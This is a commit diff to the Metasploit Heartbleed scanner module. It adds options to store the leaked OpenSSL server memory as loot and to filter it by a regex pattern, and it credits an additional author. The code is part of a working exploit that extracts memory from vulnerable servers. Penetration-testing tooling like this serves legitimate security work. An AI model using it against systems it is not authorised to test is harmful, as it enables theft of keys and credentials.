Land #3232, Heartbleed memory dump filtering

2014-04-11 12:46:01 -05:00 · 2014-04-11 12:46:01 -05:00 · 6599999b8a
parent b69662fa42 a63f020a68
commit 6599999b8a
1 changed files with 22 additions and 11 deletions
--- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
+++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
@ -100,7 +100,8 @@ class Metasploit3 < Msf::Auxiliary
        'FiloSottile', # PoC site and tool
        'Christian Mehlmauer', # Msf module
        'wvu', # Msf module
-        'juan vazquez' # Msf module
+        'juan vazquez', # Msf module
+        'Sebastiano Di Paola' # Msf module
      ],
      'References'     =>
        [
@ -120,7 +121,9 @@ class Metasploit3 < Msf::Auxiliary
      [
        Opt::RPORT(443),
        OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]),
-        OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']])
+        OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']]),
+        OptBool.new('STOREDUMP', [true, 'Store leaked memory in a file', false]),
+        OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil])
      ], self.class)

    register_advanced_options(
@ -291,16 +294,24 @@ class Metasploit3 < Msf::Auxiliary
        :refs => self.references,
        :info => "Module #{self.fullname} successfully leaked info"
      })
-      path = store_loot(
-        "openssl.heartbleed.server",
-        "application/octet-stream",
-        ip,
-        heartbeat_data,
-        nil,
-        "OpenSSL Heartbleed server memory"
-      )
+      if datastore['STOREDUMP']
+        pattern = datastore['DUMPFILTER']
+        if pattern
+          match_data = heartbeat_data.scan(pattern).join
+        else
+          match_data = heartbeat_data
+        end
+        path = store_loot(
+          "openssl.heartbleed.server",
+          "application/octet-stream",
+          ip,
+          match_data,
+          nil,
+          "OpenSSL Heartbleed server memory"
+        )
+        print_status("#{peer} - Heartbeat data stored in #{path}")
+      end
      vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}")
-      print_status("#{peer} - Heartbeat data stored in #{path}")
    else
      vprint_error("#{peer} - Looks like there isn't leaked information...")
    end